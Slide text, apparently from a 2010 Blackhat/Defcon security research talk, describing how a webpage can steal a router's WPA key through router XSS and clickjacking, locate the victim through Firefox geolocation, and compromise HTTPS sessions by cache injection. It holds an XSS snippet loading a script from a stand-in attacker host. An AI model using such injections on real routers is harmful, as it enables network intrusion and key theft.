Bad memories - Blackhat & Defcon 2010
-
Upload
elie-bursztein -
Category
Internet
-
view
506 -
download
1
Transcript of Bad memories - Blackhat & Defcon 2010
![Page 1: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/1.jpg)
Bad MemoriesElie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
Stanford University
1
![Page 2: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/2.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Catcher
Bad Memories leads to conflict
![Page 3: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/3.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
How to break a security mechanism
![Page 4: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/4.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
How to break a security mechanism
1. Find a design flaw
![Page 5: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/5.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
How to break a security mechanism
1. Find a design flaw
2. Exploit implementation vulnerability
![Page 6: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/6.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
How to break a security mechanism
1. Find a design flaw
2. Exploit implementation vulnerability
3. Make it irrelevant
![Page 7: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/7.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
How to break a security mechanism
1. Find a design flaw
2. Exploit implementation vulnerability
3. Make it irrelevant Focus of this talk
![Page 8: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/8.jpg)
http://ly.tl/t9Bad memoriesElie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
Irrelevant ?
![Page 9: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/9.jpg)
http://ly.tl/t9Bad memoriesElie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
Irrelevant ?
Secure protocol
![Page 10: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/10.jpg)
http://ly.tl/t9Bad memoriesElie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
Irrelevant ?
Secure protocol Side Channel
![Page 11: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/11.jpg)
http://ly.tl/t9Bad memoriesElie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
Irrelevant ?
Secure protocol Side Channel
![Page 12: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/12.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Outline
![Page 13: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/13.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Outline
• Breaking into a WPA network with a webpage
![Page 14: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/14.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Outline
• Breaking into a WPA network with a webpage
• Attacking HTTPS with cache injection
![Page 15: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/15.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Outline
• Breaking into a WPA network with a webpage
• Attacking HTTPS with cache injection
• Stealing private data with frame leak attacks
![Page 16: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/16.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Outline
• Breaking into a WPA network with a webpage
• Attacking HTTPS with cache injection
• Stealing private data with frame leak attacks
• Owning phone with clickjacking on steroids
![Page 17: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/17.jpg)
Bad memories http://ly.tl/t9Elie Bursztein, Baptiste Gourdin, Gustav RydstedtElie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
Breaking into a WPA network with a Webpage
![Page 18: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/18.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Toward a secure world ?
![Page 19: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/19.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Toward a secure world ?
WEP
![Page 20: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/20.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Toward a secure world ?
WEP WPA
![Page 21: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/21.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Toward a secure world ?
WEP WPA
Secret key are still stored via a web interface
![Page 22: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/22.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Some routers
![Page 23: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/23.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
![Page 24: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/24.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Ads poisoning
http://blog.avast.com/2010/02/18/ads-poisoning-–-jsprontexi/
![Page 25: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/25.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Browser same origin policy (SOP)
http://mail.google.comhttp://evil.com
![Page 26: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/26.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Browser same origin policy (SOP)
Post
http://mail.google.comhttp://evil.com
![Page 27: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/27.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Browser same origin policy (SOP)
Read
Post
http://mail.google.comhttp://evil.com
![Page 28: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/28.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Internet
Getting the key from a web page
.js
![Page 29: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/29.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Internet
Getting the key from a web page
![Page 30: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/30.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
![Page 31: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/31.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
192.168.0.1
![Page 32: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/32.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
192.168.1.1
![Page 33: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/33.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
192.168.2.1
![Page 34: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/34.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Same origin policy limitation
Same origin policy prevents us from knowing what kind of authentication the router use
![Page 35: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/35.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Same origin policy limitation
Same origin policy prevents us from knowing what kind of authentication the router use
Firefox vulnerabilities
![Page 36: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/36.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
<img src=”e.jpg”/>
192.168.2.1:1372
![Page 37: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/37.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
<img src=”e.jpg”/>
192.168.2.1:1372
![Page 38: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/38.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
Brand AModel XY
![Page 39: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/39.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
![Page 40: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/40.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
![Page 41: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/41.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Same origin policy limitation
Same origin policy prevents us from reading router WPA key
![Page 42: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/42.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Same origin policy limitation
Same origin policy prevents us from reading router WPA key
Router XSS vulnerabilities (5 / 8 brands)
![Page 43: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/43.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
<script src=”http://badguy.com/script.js/>”
![Page 44: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/44.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
<script src=”http://badguy.com/script.js/>”
![Page 45: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/45.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
![Page 46: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/46.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
![Page 47: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/47.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Getting the key from a web page
![Page 48: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/48.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
No XSS ?
What if we can’t find a XSS or it is not exploitable ?
![Page 49: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/49.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
No XSS ? No problem !
Use Clickjacking drag and drop attack by P. Stone !
![Page 50: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/50.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
No XSS ? No problem !
Use Clickjacking drag and drop attack by P. Stone !
8/8 Router brands are vulnerable to clickjacking
![Page 51: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/51.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Internet
![Page 52: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/52.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Internet
![Page 53: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/53.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Where are you ?
• We’ve go the key but were is the network ?
Also found by Sami Kemvar
![Page 54: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/54.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Where are you ?
• We’ve go the key but were is the network ?
There
is an a
pp
for that
!
Also found by Sami Kemvar
![Page 55: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/55.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Firefox Locate me protocol
![Page 56: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/56.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Firefox Locate me protocol
![Page 57: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/57.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Firefox Locate me protocol
![Page 58: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/58.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Behind the curtain
![Page 59: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/59.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Firefox Locate me protocol
Wifi SSID MAC @
Victim E2:54:D7:1A
Does not acceptPOST XHR
![Page 60: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/60.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Firefox Locate me protocol
Wifi SSID MAC @
Victim E2:54:D7:1A
{ "host" : "Test","radio_type" : "unknown", "request_address" : true, "version" : "1.1.0", "wifi_towers" : [ {"mac_address" :"E2:54:D7:1A", "ssid" : "Victim" }]}";
Does not acceptPOST XHR
![Page 61: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/61.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Firefox Locate me protocol
Wifi SSID MAC @
Victim E2:54:D7:1A
{"latitude" : 128.51 , "longitude : ” : -58.23, address: "Victim location ..."}
Does not acceptPOST XHR
![Page 62: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/62.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Firefox Locate me protocol
![Page 63: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/63.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Firefox Locate me protocol
{"latitude" : 128.51 , "longitude : ” : -58.23}
![Page 64: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/64.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Firefox Locate me protocol
![Page 65: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/65.jpg)
http://ly.tl/t9Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories
WPA Breaker demo
![Page 66: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/66.jpg)
Bad memories http://ly.tl/t9Elie Bursztein, Baptiste Gourdin, Gustav RydstedtElie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
Attacking HTTPS via cache injection
![Page 67: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/67.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
The “Plan”
• Background
• Cache Injection attack
• Defenses ?
• By passing the defenses
![Page 68: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/68.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Anatomy of web page
htmljpgjs flash
![Page 69: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/69.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Anatomy of web page
html
jpgjs flash
![Page 70: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/70.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Anatomy of web page
jpgjs flash
![Page 71: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/71.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Anatomy of web page
js flash
![Page 72: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/72.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Anatomy of web page
flash
![Page 73: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/73.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Anatomy of web page
![Page 74: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/74.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
.js
Browser caching
.js
.html
.html
![Page 75: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/75.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
.js
Browser caching
.js
.html
![Page 76: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/76.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
.js
Browser caching
.js
.html
![Page 77: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/77.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
.js
Browser caching
.js
![Page 78: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/78.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
.js
Browser caching
![Page 79: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/79.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
43% of the Alexa top 100,000 web sites use at least one external javascript library
![Page 80: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/80.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Most used libraries
Google analytics
JQuery
swfobjects
Google syndication
Prototype
Quanta
Yahoo
Mootool
Addthis
Scriptaculous
Omniture
Dojo
0 3750 7500 11250 15000
![Page 81: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/81.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
.js
Attack scenario
.html
![Page 82: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/82.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
.js
Attack scenario
.html
![Page 83: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/83.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
.js
Attack scenario
![Page 84: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/84.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
.js
Attack scenario
![Page 85: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/85.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Later... ...
![Page 86: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/86.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
.html
Attack scenario
.js.js
![Page 87: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/87.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Attack scenario
.js.js
![Page 88: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/88.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Attack scenario
.js
![Page 89: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/89.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Shared library and cache
A single malicious library cached leads to multiple compromised HTTPS sessions
![Page 90: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/90.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Shared library and cache
A single malicious library cached leads to multiple compromised HTTPS sessions
JQuery
